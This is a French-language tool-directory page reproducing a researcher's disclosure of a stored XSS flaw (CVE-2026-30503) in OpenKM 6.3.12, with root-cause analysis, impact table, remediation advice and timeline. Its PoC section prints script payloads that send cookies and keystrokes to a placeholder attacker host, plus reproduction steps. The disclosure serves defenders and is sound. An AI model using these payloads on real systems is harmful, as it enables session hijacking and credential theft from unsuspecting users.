Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — Divulgation détaillée de CVE-2026-30503, une vulnérabilité XSS stockée dans OpenKM v6.3.12. Comprend l'analyse de la cause racine, les charges utiles PoC, l'évaluation de l'impact et les recommandations de correction pour les chercheurs en sécurité et les pentesteurs. | Kitploit
Outils/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Divulgation détaillée de CVE-2026-30503, une vulnérabilité XSS stockée dans OpenKM v6.3.12. Comprend l'analyse de la cause racine, les charges utiles PoC, l'évaluation de l'impact et les recommandations de correction pour les chercheurs en sécurité et les pentesteurs.

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2026-30503 — XSS stocké dans OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Découvert et signalé par Dharmendra Kumar — Chercheur en sécurité

Cybersécurité | Test d'intrusion | Recherche de vulnérabilités | Divulgation responsable


📌 Table des matières

  • Vue d'ensemble
  • Détails CVE
  • Produit concerné
  • Description de la vulnérabilité
  • Analyse de la cause racine
  • Impact et évaluation des risques
Preuve de concept (PoC)
  • Correction et recommandations
  • Calendrier de divulgation
  • Références
  • À propos du chercheur

  • 🔍 Vue d'ensemble

    Ce dépôt documente la divulgation responsable de CVE-2026-30503, une vulnérabilité de Cross-Site Scripting stocké (XSS stocké) identifiée dans OpenKM v6.3.12 — un système de gestion de documents open-source largement utilisé dans les environnements d'entreprise.

    La vulnérabilité permet à un attaquant authentifié d'injecter du JavaScript malveillant persistant dans l'application, qui s'exécute dans le contexte navigateur de tout utilisateur (y compris les administrateurs) qui consulte ultérieurement le contenu affecté.

    ⚠️ Sévérité : Élevée | Vecteur d'attaque : Réseau | Privilèges requis : Faibles | Interaction utilisateur : Requise


    📋 Détails CVE

    ChampDétails
    Identifiant CVECVE-2026-30503
    ProduitOpenKM
    Version affectéev6.3.12
    Classe de vulnérabilitéCross-Site Scripting stocké (XSS stocké)
    CWECWE-79 : Neutralisation incorrecte de l'entrée lors de la génération de pages web
    Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
    ChercheurDharmendra Kumar
    Type de divulgationResponsable / Coordonnée

    📦 Produit concerné

    OpenKM est un système de gestion de documents (DMS) gratuit et open-source qui fournit une interface web pour gérer, auditer et distribuer des documents professionnels. Il est utilisé par des entreprises, des organismes gouvernementaux et des établissements d'enseignement dans le monde entier.

    • Nom du produit : Système de gestion de documents OpenKM
    • Version affectée : v6.3.12
    • Site web du fournisseur : https://www.openkm.com
    • Catégorie : Système de gestion de documents (DMS)
    • Langage/Stack : Java (JSP/Spring)

    🧨 Description de la vulnérabilité

    De multiples vulnérabilités de Cross-Site Scripting stocké (XSS stocké) ont été découvertes dans OpenKM v6.3.12. Un attaquant disposant d'un accès authentifié à faibles privilèges peut injecter des charges utiles JavaScript arbitraires dans un ou plusieurs champs de saisie. Ces charges utiles sont stockées de manière permanente dans le backend de l'application et exécutées automatiquement dès que tout utilisateur — y compris les administrateurs — accède à la page ou au composant concerné.

    Contrairement au XSS réfléchi, qui nécessite que la victime clique sur un lien spécialement conçu, les charges utiles de XSS stocké sont intégrées dans l'application elle-même, ce qui les rend nettement plus dangereuses et persistantes.

    Point(s) d'entrée vulnérable(s)

    • Champs de saisie fournis par l'utilisateur dans les métadonnées, notes ou champs de nom des documents
    • L'application ne nettoie ni n'encode les entrées utilisateur avant de les renvoyer au navigateur

    🔬 Analyse de la cause racine

    La vulnérabilité provient de trois faiblesses combinées dans le pipeline de traitement des entrées de l'application :

    root@kitploit:~
    User Input ──► [NO Validation] ──► Stored in DB ──► [NO Output Encoding] ──► Rendered in Browser ──► XSS Executed
    
    FaiblesseDescription
    ❌ Validation d'entrée manquanteL'application ne restreint ni ne nettoie les caractères spéciaux (<, >, ", ', ;) dans les champs fournis par l'utilisateur
    ❌ Encodage de sortie manquantLes valeurs stockées sont rendues directement dans le HTML sans encodage en entités HTML
    ❌ Rendu DOM non sécuriséLes données fournies par l'utilisateur sont intégrées dans le contexte DOM sans CSP ni contrôles de nettoyage

    💥 Impact et évaluation des risques

    Une exploitation réussie de cette vulnérabilité peut entraîner :

    RisqueDescription
    🍪 Vol de sessionVoler les jetons de session authentifiés via l'exfiltration de document.cookie
    👤 Prise de contrôle de compteCompromettre les comptes des victimes, y compris les comptes administrateur
    🔐 Capture de mots de passeInjecter des formulaires de phishing pour capturer les identifiants de connexion
    📤 Exfiltration de donnéesExtraire silencieusement des documents ou métadonnées sensibles du DMS
    ⚙️ Actions non autoriséesEffectuer des opérations privilégiées au nom de la victime (supprimer/modifier des documents)
    🎯 Ciblage des administrateursLa charge utile s'exécute dans le panneau d'administration lorsqu'un administrateur examine le contenu
    🔄 Propagation de verCharge utile XSS auto-réplicative pouvant se propager entre utilisateurs

    🧪 Preuve de concept (PoC)

    ⚠️ Avertissement : Cette PoC est partagée strictement à des fins éducatives et de recherche en sécurité dans le cadre de principes de divulgation responsable. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de tester.

    Exemple de charge utile (générique)

    root@kitploit:~
    // PoC de base — démontre l'exécution de script
    <script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>
    
    // Exfiltration du jeton de session
    <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>
    
    // Injection de keylogger
    <script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>
    

    Étapes pour reproduire

    1. Connectez-vous à OpenKM v6.3.12 avec un compte authentifié à faibles privilèges
    2. Naviguez vers le champ de saisie vulnérable (par exemple, métadonnées de document / notes / champ de titre)
    3. Injectez une charge utile XSS comme <script>alert(document.cookie)</script>
    4. Enregistrez / soumettez l'entrée
    5. Connectez-vous en tant qu'un autre utilisateur (ou administrateur) et naviguez vers la ressource affectée
    6. Observez l'exécution de la charge utile JavaScript dans le contexte navigateur de la victime

    🛠️ Correction et recommandations

    Pour les développeurs / fournisseurs

    RecommandationMise en œuvre
    ✅ Validation d'entréeWhitelist des caractères autorisés ; rejeter ou supprimer les caractères spéciaux HTML sur toutes les entrées utilisateur
    ✅ Encodage de sortieUtiliser un encodage HTML contextuel (par ex., OWASP Java Encoder) avant de rendre les données en HTML
    ✅ Politique de sécurité du contenu (CSP)Implémenter un en-tête CSP strict : Content-Security-Policy: script-src 'self'
    ✅ Cookies HTTPOnly et SecureDéfinir les drapeaux HttpOnly et Secure sur tous les cookies de session pour empêcher l'accès JavaScript
    ✅ Utiliser des bibliothèques de sécuritéIntégrer OWASP AntiSamy ou DOMPurify pour le nettoyage HTML
    ✅ Revue de code de sécuritéAuditer tous les chemins de rendu pour les données contrôlées par l'utilisateur non nettoyées
    ✅ Mise à jourAppliquer le dernier correctif fourni par le fournisseur ou passer à une version corrigée

    Pour les administrateurs système

    • 🔒 Restreindre l'accès à l'instance OpenKM aux réseaux de confiance uniquement
    • 📊 Surveiller les journaux de l'application pour toute activité inhabituelle ou balises de script inattendues dans les champs de saisie
    • 🔄 Maintenir l'application à jour avec la dernière version corrigée
    • 🧩 Déployer un pare-feu applicatif web (WAF) avec des règles de détection XSS comme mesure de compensation

    📅 Calendrier de divulgation

    DateÉvénement
    🔍 DécouverteVulnérabilité identifiée lors de l'évaluation de sécurité d'OpenKM v6.3.12
    📧 Notification au fournisseurRapport de divulgation initial soumis à l'équipe de sécurité d'OpenKM
    🤝 Accusé de réception du fournisseurL'équipe OpenKM a accusé réception du rapport
    📝 Attribution CVECVE-2026-30503 attribué par le programme CVE
    🌐 Divulgation publiqueDivulgation publique coordonnée après la période de correction

    Cette vulnérabilité a été divulguée conformément aux meilleures pratiques de divulgation responsable, en coordination avec le fournisseur et le programme CVE avant la publication publique.


    📚 Références

    • 🔗 [ Github] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
    • 🔗 Entrée CVE MITRE — CVE-2026-30503
    • 🔗 NVD — Base de données nationale des vulnérabilités
    • 🔗 Site officiel d'OpenKM
    • 🔗 Aide-mémoire OWASP pour la prévention XSS
    • 🔗 CWE-79 : Cross-site Scripting
    • 🔗 OWASP Top 10 — A03:2021 Injection

    👨‍💻 À propos du chercheur

    Dharmendra Kumar

    Chercheur en sécurité | Testeur d'intrusion | Chasseur de bugs

    Dharmendra Kumar est un chercheur en cybersécurité indépendant spécialisé dans la sécurité des applications web, les tests d'intrusion et la divulgation responsable de vulnérabilités. Axé sur l'identification de failles de sécurité réelles dans les logiciels largement utilisés, son travail contribue à améliorer la posture de sécurité des applications utilisées mondialement.

    Domaines d'expertise :

    • 🌐 Test d'intrusion d'applications web
    • 🐛 Chasse aux bugs (Bug Bounty)
    • 🔍 Recherche de vulnérabilités et rapport CVE
    • 📋 Divulgation responsable et avis de sécurité
    • 🛡️ Vulnérabilités OWASP Top 10

    Connecter :

    LinkedIn GitHub Twitter


    ⚖️ Avertissement légal

    Ce dépôt est destiné uniquement à des fins éducatives et d'information. Les détails de la vulnérabilité et les charges utiles de preuve de concept partagées ici sont publiés conformément aux principes de divulgation responsable. L'auteur n'approuve, n'encourage ni ne prend la responsabilité de toute utilisation non autorisée de ces informations. Obtenez toujours une autorisation écrite explicite avant d'effectuer des tests de sécurité sur un système.


    🙏 Remerciements

    Remerciements particuliers à :

    • L'équipe de développement d'OpenKM pour leur coopération pendant le processus de divulgation responsable
    • Le programme CVE / MITRE Corporation pour l'attribution et la coordination de l'identifiant CVE
    • La communauté plus large de la recherche en sécurité pour leurs efforts continus visant à rendre les logiciels plus sûrs pour tous

    ⭐ Si cette recherche vous a été utile, pensez à mettre une étoile sur ce dépôt.

    © 2026 Dharmendra Kumar — Tous droits réservés

    Visitors

    Télécharger l’outil